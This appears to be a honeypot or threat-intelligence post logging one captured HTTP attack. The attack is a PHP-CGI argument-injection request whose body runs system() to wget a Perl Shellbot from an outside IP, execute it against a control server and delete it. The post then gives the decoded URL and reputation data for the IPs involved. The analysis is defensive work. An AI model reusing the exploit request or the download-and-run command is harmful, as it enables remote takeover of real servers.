BEGIN OF HTTP DATA:
2015-07-24 13:15:21
Source IP: 128.41.128.44
Country: GB RiskScore: 7.1 Malware: []
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%
64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F
%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("wget 194.60.242.251/minispeedtest/speedtest/.z/hb/plk03 -O /tmp/.0e1bc.log;perl /tmp/.0e1bc.log 188.165.44.137;rm -rf /tmp/.0e1bc.log;"); ?>
END OF DATA
the decoded url looks like
/phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-nthe actual downloadable is a perl based Shellbot
- 188.165.44.137 the url to connect to within the command
{
"categoryDescriptions": {},
"cats": {},
"geo": {
"country": "France",
"countrycode": "FR"
},
"ip": "188.165.44.137",
"reason": "Regional Internet Registry",
"reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
"score": 1,
"subnets": [
{
"categoryDescriptions": {},
"cats": {},
"created": "2012-03-22T07:26:00.000Z",
"geo": {
"country": "France",
"countrycode": "FR"
},
"ip": "188.165.0.0",
"reason": "Regional Internet Registry",
"reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
"score": 1,
"subnet": "188.165.0.0/16"
}
]
} - 194.60.242.251 the download url
{
"categoryDescriptions": {
"Scanning IPs": "These IPs have been identified as illegally scanning networks for vulnerabilities."
},
"cats": {
"Scanning IPs": 14
},
"geo": {
"country": "Ukraine",
"countrycode": "UA"
},
"ip": "194.60.242.251",
"reason": "Firewall deny log analysis",
"reasonDescription": "This IP was involved in port scanning activities.",
"score": 1.4,
"subnets": [
{
"categoryDescriptions": {},
"cats": {},
"created": "2012-03-22T07:26:00.000Z",
"geo": {
"country": "Ukraine",
"countrycode": "UA"
},
"ip": "194.60.242.0",
"reason": "Regional Internet Registry",
"reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
"score": 1,
"subnet": "194.60.242.0/24"
}
]
} - 194.24.228.203 the hardcoded bot ip
{
"categoryDescriptions": {},
"cats": {},
"geo": {
"country": "France",
"countrycode": "FR"
},
"ip": "194.24.228.203",
"reason": "Regional Internet Registry",
"reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
"score": 1,
"subnets": [
{
"categoryDescriptions": {},
"cats": {},
"created": "2012-03-22T07:26:00.000Z",
"geo": {
"country": "France",
"countrycode": "FR"
},
"ip": "194.24.228.0",
"reason": "Regional Internet Registry",
"reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
"score": 1,
"subnet": "194.24.228.0/23"
}
]
}
Keine Kommentare:
Kommentar veröffentlichen